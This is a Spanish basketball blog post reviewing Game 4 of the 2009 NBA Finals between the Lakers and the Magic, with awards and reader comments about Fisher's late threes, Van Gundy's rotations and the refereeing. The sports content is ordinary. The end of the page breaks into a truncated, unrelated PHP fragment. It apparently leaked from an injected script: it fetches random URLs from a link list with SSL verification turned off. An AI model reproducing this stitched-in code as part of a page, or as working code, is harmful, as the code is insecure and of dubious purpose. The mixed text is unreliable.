Playoffs 2009 (Game 4): La ganancia del pescador

12 de June de 2009 por TheDeerHunter

fishclutchLlegábamos a este punto de la ecuación con una gran duda creciente de quién está siendo mejor en esta finalísima. Quitando el excepcional primer partido en L.A., la igualdad ha marcado la serie, quizás levemente inclinada a favor de Orlando con una preocupante incapacidad para rematar su buen hacer que ya le costó el segundo. No es raro perder un partido tras un 2-0 a favor, de hecho es bastante frecuente. Sin embargo en esos casos el cuarto siempre marca con exactitud si la diferencia es real o ficticia, si un equipo es superior o no lo es absoluto. Y en medio de estas tribulaciones, aquí llegamos.

Si los Lakers pretendían marcar territorio en este partido no empezaron nada bien. Bynum apenas lograba mantenerse algo más de dos minutos en el campo antes de cometer sus ya tradicionales dos primeras faltas. No lo iban a hacer mucho mejor ni Odom ni Gasol en este sentido y había que darles minutos a Mbenga y Powell desde el principio, o incluso hacer malabarismos con Walton de 4… Superman Howard se frotaba las manos. Todo volvía al Kobesistema, esta vez por necesidad, tratando de dormir lo máximo el partido y que finalizara el cuarto con el mínimo de sangre perdida. Con un Turkoglu sublime, se terminaba el periodo únicamente con un +4 para los locales. Muy poco botín para tanto saqueo.

El segundo fue todavía peor para los Lakers, con los suplentes. El panorama era desolador, con Odom y Bynum apenas llegando a disfrutar algún minuto. Vujacic no es capaz de anotar ni un solo punto en las Finales y Farmar sigue en su línea de completo desorden. Controlando un poco más a Kobe, Orlando no tuvo que exprimirse demasiado en alcanzar una ventaja cómoda para cerrar la primera parte. Quizás debieron haberlo hecho.

En el tercero, la revolución. Los Lakers dieron un arreón de esa casta que tanto les cuesta sacar. Pau estuvo como un titán atrás y por una vez los otros controlaron el ímpetu con faltas. Apareció Ariza en una racha que cogió por sorpresa a los Magic e incluso logró secar a Turkoglu. En un abrir y cerrar de ojos, la ventaja se había esfumado. Howard no lograba imponerse en ataque y Lewis seguía desaparecido. Los Lakers parecían tenerlo todo controlado.

paudunkpietrusPero no. A estos Lakers les gusta la mala vida. Apenas tras un par de minutos de último cuarto y Odom & Bynum se cargaban con 5 cada uno. Tocaba de nuevo sufrir, y mucho. Kobe, otra vez superado por Pietrus en la fase final y poco acertado; Howard, puliéndose records históricos de tapones, cerca del triple doble; y remataba Turkoglu, con esa sonrisa de killer, haciéndolo todo bien. +5 Orlando a 1:34. Los Lakers lo veían perdido. Y los Magic no remataron. Ya no anotarían más. En los últimos 30 segundos llegó el milagro tradicional de L.A.: Cuando hablamos de milagro, si no está Horry vestido de corto… balones a Fisher. Tras un mate de Gasol a pase de Kobe y dos tiros libres errados por Howard, apareció el viejo pescador para anotar el triple, forzar el empate y llevar el partido a la prórroga. Increíble e incomprensible. Para que luego critiquemos a Phil Jackson por preparar las decisivas para él.

La prórroga fue una lucha a muerte. El Kobesistema sobreexplotado, llevando los tiempos, con Gasol cerrándolo todo. Un muro aun sin tropecientos tapones. Y Fisher, otra vez martilleando las esperanzas de Orlando desde más allá de la línea de tres. La tensión pudo con los locales. Turkoglu falló una tras otra y Gasol maquilló sus números ofensivos con un demoledor final. La agresión final de Pietrus fue reflejo de la impotencia, buen resumen de este duelo. A Orlando se le presenta una nueva oportunidad para levantarse de un golpe tremendo. Ya van unas cuantas. Pero ésta será la última.

PREMIOS TJNBA:

MVP: Los Lakers viven y mueren en Kobe. No jugó bien… sobre todo en los momentos decisivos donde otra vez no supo leer la situación. Y sin embargo ahí están sus números. Aguantó al equipo cuando no había nadie que lo hiciera y de sus manos salió el pase que dio el milagro. Algo de mérito tiene que tener. Si lo machacamos cuando el equipo pierde también debemos destacarle cuando kobefishgana, aún sin hacer un buen partido. Es el líder y punto.

La sorpresa: Horry… no, que se ha retirado. Otro milagro de Fisher ¿y otro anillo para el hombre de los milagros? Cuánto le deben estos Lakers a Derek Fisher y lo rápido que se olvida eso cuando las cosas no salen como a él le gustaría.

La decepción: Demasiadas sonrisitas cuando no había nada decidido. Menudo palo que se llevan los chicos de Van Gundy. Si Rashard Lewis hubiera encontrado un agujero en medio de la cancha no habría estado mejor escondido que donde quiera que estuviera anoche.

El mayor esfuerzo en vano: Es una maravilla ver jugar a Turkoglu. Jugador inteligentísimo donde los haya. En lugar de sudor transpira clase… Pero hoy el premio se lo damos a Dwight Howard, rozando el triple doble con 20 rebotes y 9 tapones. Escribiendo la historia. Eso sí… en ataque no pudo nunca con Titán Pau.

Comenta

8 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Un poco más calmado después de reposar las emociones que hemos vivido esta madrugada (he tenido que contenerme seriamente para no armarla a las 6 de la mañana) no puedo creer todavía lo que le pasó a Orlando anoche. Me cuesta recordar algo similar… y ahora mismo, con la neblina que tengo en la cabeza, no soy capaz de encontrar nada similar.

    Es difícil encontrar razones para una cosa así. Casi todo lo reduciría a la flor de Phil Jackson… pero hay algo que me resulta incomprensible. El desmierde que tiene Stan Van Gandy con respecto sus bases no tiene parangón. Cuando repaso mentalmente el tiro de Fisher observo la carita de Nelson, que jugó todos los minutos decisivos.
    No voy a cargar contra su discutible defensa en esos momentos… creo que él no es el responsable y en muchos aspectos lo hizo muy bien. Sería muy ventajista criticarle por cómo terminó todo.
    Es lo que respecta a Alston y a Reddick lo que me deja con el culo torcido. Reddick lo hizo muy bien durante el rato que estuvo en pista durante la primera parte. Hizo mucho daño, tanto ofensiva como defensivamente en los momentos en los que Orlando fue más superior. Y después… ya no salió.
    Y Alston… vale, no jugó bien. Pero es el desorden que le crea a Fisher lo más valioso que podría haber aportado ¿le hubiera defendido con tal candidez a Fisher en ese tiro?? Lo dudo mucho.
    Creo que Nelson en condiciones normales es mucho mejor que Alston sí… aunque no ahora. Lo que da Nelson no es lo que necesitan estos Magic. Lo que da Alston sí, pero desde el banco es difícil.

      Citar

  2. PIRATA dice:
    #2

    Por fin los americanos empiezan a reconocer a Pau!!!!!!
    He hechado un vistazo por algun foro de Los Angeles y a parte del debate con Kobe (como aqui) la gente saca datos como que L.A. no ha perdido tres partidos seguidos desde que llegó Pau en febrero’08 y referentes al debate Kobe hay batantes que recuerdan que después de destruir el equipo en 2004 el solito no ha hecho nada, solo con el cambio de actitud y la llegada de Pau los L.A. han llegado a dos finales.

      Citar

  3. Eleven dice:
    #3

    En primer lugar, enhorabuena por el blog. De lo mejorcito que hay por ahi.

    En segundo lugar, creo que las finales las estan ganando los Lakers por méritos propios, pero casi también diría que las está perdiendo Van Gundy.

    El amigo Stan es uno de esos técnicos que sufren frecuentes “ataques de entrenador”. Es decir, que cambian cosas que van bien y la acaban pifiando.

    Con este tipo es imposible predecir qué va a hacer. De repente dices: “Pero… ¿por qué saca a este ahora?”. Ves que un jugador está haciendo un gran partido contra todo pronóstico, y cuando parece que está mas caliente… lo saca.

    Ataques de entrenador. Y cuando empieza a pensar que se ha equivocado, trata de solucionarlo arengando a los jugadores con frases como: “Remember the first game! We are playing the same way!” o mi preferida: “C’mon! It’s winning time!”

    Pues mira, campeón, si es la hora de ganar, aplicate el cuento, deja de hacer inventos y saca a jugar los minutos importantes a los que tienes que sacar.
    Con la capacidad que mostró Orlando para jugar en equipo en el P3 con Alston en pista, es como para no tocarlo demasiado, creo yo. Mientras Rafer ya se ha mostrado mas que capaz de manejar adecuadamente a su equipo, Jameer Nelson demuestra que está a un nivel como para salir a sufrir un ratito contra Farmar.

    Yo creo que cosas como esta terminan por decantar una final tan ajustada.
    Mucho mas que la famosa flor del tio Phil.

    En lo que respecta a los Lakers, hay que ver lo gratuito que es criticar desde algunos sitios a Kobe por hacer un partido “regular sin pasarse” en las finales.
    Kobe en un partido normalito, míra los numeros que hace… y promedia 33 puntos en la serie. Creo que algun dia nos daremos cuenta todos de que para acercarse a el dios Jordan no es necesario ganar el partido con un buzzer beater imposible. A mi, como me pasaba con MJ, cada vez que Kobe Bryant coge la naranja me da la impresión de que el mundo se detiene.
    Pau también merece mención aparte. Cuando acabe esta final y pasen los días con el anillo en el dedo, se dará cuenta de lo grande que es, de lo mucho que ha mejorado desde su llegada a USA y de lo importantisimo que es en uno de los mejores equipos de la historia. Me ha encantado eso de “Titan Pau”. Absolutely PAUerful Gasol.
    Fisher no me gusta nada, pero tienes razón en que le ha dado muchísimo a los Lakers en su historia. También me recordó a “Ese extraño elemento llamado Robert Horry”. Qué crack.

    Esto está visto para sentencia.
    Ha vuelto la fiebre amarilla a nuestras vidas, y esperemos que tarde mucho en volverse a marchar.

    Un saludo.

      Citar

  4. MagicJohnson32 dice:
    #4

    Y Fisher lo volvió a hacer. Como dice el L.A. Times, la mítica “0.4” ha pasado a ser ‘sólo’ la tercera canasta más importante de su carrera tras los dos triplazos de anoche.

    Fue un partido precioso, aunque no sé si diría lo mismo de haber palmado los Lakers. La cosa es que está hecho. O debería estarlo. Fijaos cómo es Fisher que anoche, tras convertirse en el héroe, lo que dijo a sus compañeros es que hay que mantenerse muy concentrados para el partido del domingo y recordó aquel 5º partidos de las Finales Lakers-Pacers de 2000, cuando los Lakers ganaban 3-1 (tras un 4º partido como el de ayer, ganado a domicilio, en aquella espectacular prórroga de Kobe con Shaq ya eliminado por faltas) y fueron aplastados por Indiana.

    Me encantó la actitud y la fortaleza mental que mostramos.

    Yo tampoco entiendo a Van Gundy con el tema bases. Ojo, que Nelson tuvo buenos momentos. Pero sinceramente me parece que no es momento de jugar con la confianza de tu base titular, y menos tratándose de un tío como Alston.

      Citar

  5. ñBA dice:
    #5

    Otro titular perfecto 😉

    Nelson tuvo buenos momentos, y muchísimo mejor de lo que se esperaba, pero Alston merecía su lugar en los instantes finales.

    Instantes en los que Orlando pareció un juguete en mano de Lakers, aunque si no llega a ser por el milagro de Fisher (0/5 llevaba)…

      Citar

  6. TheDeerHunter dice:
    #6

    Pues no, yo no diría lo mismo…

    Veo muy preocupante el nivel de los árbitros durante todos los playoffs. No me gusta nada que se justifique con el “dejar jugar” típico de la postemporada y el miedo a estropear los partidos privándoles de las estrellas.
    Mira que he visto guarradas en la historia, pero nunca había visto zancadillas, empujones contra la canasta por ver si te rompes los cuernos, puñetazos a dos manos… creo que se debería parar como sea. El de anoche es uno de los arbitrajes más imprecisos (por decir algo suave) y parcial que he podido ver en mi vida.

    No entiendo porqué el arbitraje tiene que cambiar de temporada a la postemporada. Me parece bastante apestoso y una fuente de suspicacias. Los árbitros no son los protagonistas.

      Citar

  7. TheDeerHunter dice:
    #7

    Pues no hay sanción para Pietrus
    Barra libre pues

      Citar

  8. Txusma dice:
    #8

    Hoy he podido ver la jugada y la verdad es q no tiene perdon. Puñetazo a 2 manos en la espalda del contrario, q si no llega a estar cogido del aro a lo mejor lo envia lejos… Inadmisible.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>